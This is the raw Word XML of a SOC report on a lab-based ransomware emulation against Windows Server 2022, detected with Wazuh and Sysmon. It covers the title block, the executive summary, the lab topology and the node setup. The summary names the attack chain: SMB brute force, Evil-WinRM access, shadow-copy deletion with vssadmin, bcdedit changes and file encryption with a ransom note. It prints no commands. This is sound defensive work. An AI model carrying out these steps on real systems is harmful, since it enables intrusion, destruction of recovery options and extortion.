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4.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId29.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId33.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId37.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId50.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId55.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId60.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId65.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId71.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId76.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId81.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId86.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId92.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7b8b1ef78eefa291194a06106b40632f07d5c44"/>
      <w:r>
        <w:t xml:space="preserve">ENTERPRISE SECURITY OPERATIONS CENTER (SOC)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_977f7d6bec7a7473773eb0013bd2fd4e3dd83cc"/>
      <w:r>
        <w:t xml:space="preserve">COMPREHENSIVE INCIDENT DETECTION, ANALYSIS &amp; ENGINEERING REPORT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Project Title:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Multi-Stage Ransomware Attack Simulation, Telemetry Hardening, and SIEM Detection on Windows Server 2022</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Case / Incident ID:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SOC-IR-2026-1101-01</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lead Security Engineer / Author:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mohammad Hasnain Ali</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Target Asset:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WinServer-Target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Windows Server 2022 Datacenter |</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.103</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM Platform:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Wazuh XDR/SIEM v4.9.2 on Ubuntu Server 22.04 LTS (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.101</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attacking Infrastructure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Kali Linux 2026.3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.102</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Date:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">November 1, 2026</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Document Classification:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">TLP:AMBER | Internal SOC Documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_24178e17815d7ed05207769f6e2fdf5de730a75"/>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During scheduled adversary emulation testing, the Security Operations Center (SOC) investigated an end-to-end simulated ransomware attack executed against an enterprise Windows Server 2022 environment. The primary objective was to evaluate the enterprise detection posture across process creation, credential abuse, system recovery tampering, and file integrity destruction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attack lifecycle simulated an external adversary operating from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.102</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, conducting port discovery, credential brute-forcing against exposed SMB services, and achieving initial administrative access via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Remote Management (WinRM / Evil-WinRM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Following initial compromise, the adversary executed commands to inhibit system recovery by destroying Volume Shadow Copies (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vssadmin.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and modifying Boot Configuration Data (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bcdedit.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), followed by encrypting critical enterprise financial assets stored in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Finance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and dropping an extortion note (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">README_HOW_TO_RECOVER.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All attack phases were captured, audited, and correlated in real time using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Sysmon (SwiftOnSecurity configuration)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, enhanced Windows Security auditing, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Detection optimization was achieved by authoring custom high-severity XML correlation rules on the Wazuh Manager, which successfully raised Level 14 CRITICAL alerts mapped to the MITRE ATT&amp;CK framework. Full containment, adversary eviction, and lossless data recovery were subsequently verified via an automated SOC decryption utility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_d4212453f975a610661722183d308fc9b52961f"/>
      <w:r>
        <w:t xml:space="preserve">2. Lab Architecture &amp; Environment Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_ccb0fb5ce351fc87f9cf1dcd3b4c9b78c3b25be"/>
      <w:r>
        <w:t xml:space="preserve">2.1 Virtualized Environment Topology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>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IsolatedLab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Isolated Host-Only Virtual Switch (192.168.56.0/24)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ðŸ”´ Attacker Node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux 2026.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">IP: 192.168.56.102</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">- Nmap, NXC, Hydra, Evil-WinRM"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WinSrv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ðŸŽ¯ Target Node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Server 2022 Datacenter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">IP: 192.168.56.103</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">- Sysmon64 &amp; Advanced Auditing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">- Wazuh Agent v4.9.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">- Protected Path: C:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Finance"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WazuhSrv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ðŸ”µ SIEM / SOC Center</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu Server 22.04 LTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">IP: 192.168.56.101</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">- Wazuh Manager &amp; Indexer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">- Filebeat &amp; OpenSearch Dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">- Custom Rules Engine"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">end</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"1. Recon &amp; SMB Brute Force (Port 445)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WinSrv</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2. Interactive Shell via Evil-WinRM (Port 5985)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WinSrv</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WinSrv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"3. Encrypted Security Telemetry (TCP Port 1514)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WazuhSrv</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WazuhSrv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"4. HTTPS Web UI (Port 443)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SOC Analyst Workstation"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_d8abffb5278a2bf2ec1925eb11e50ce39791328"/>
      <w:r>
        <w:t xml:space="preserve">2.2 System Configurations &amp; Lab Nodes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hypervisor:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Oracle VirtualBox 7.x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network Mode:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dual-Adapter Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Adapter 1 (Host-Only):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualBox Host-Only Ethernet Adapter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, DHCP:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.100</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">â€“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.254</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Used strictly for attack and logging traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Adapter 2 (NAT):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Used during setup for package updates and initial installations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_d9d817f7bcde500ac9d407b9a1cb42d32d4d489"/>
      <w:r>
        <w:t xml:space="preserve">Lab Infrastructure Evidence:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2.1: Ubuntu Server Running Wazuh SIEM Host (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
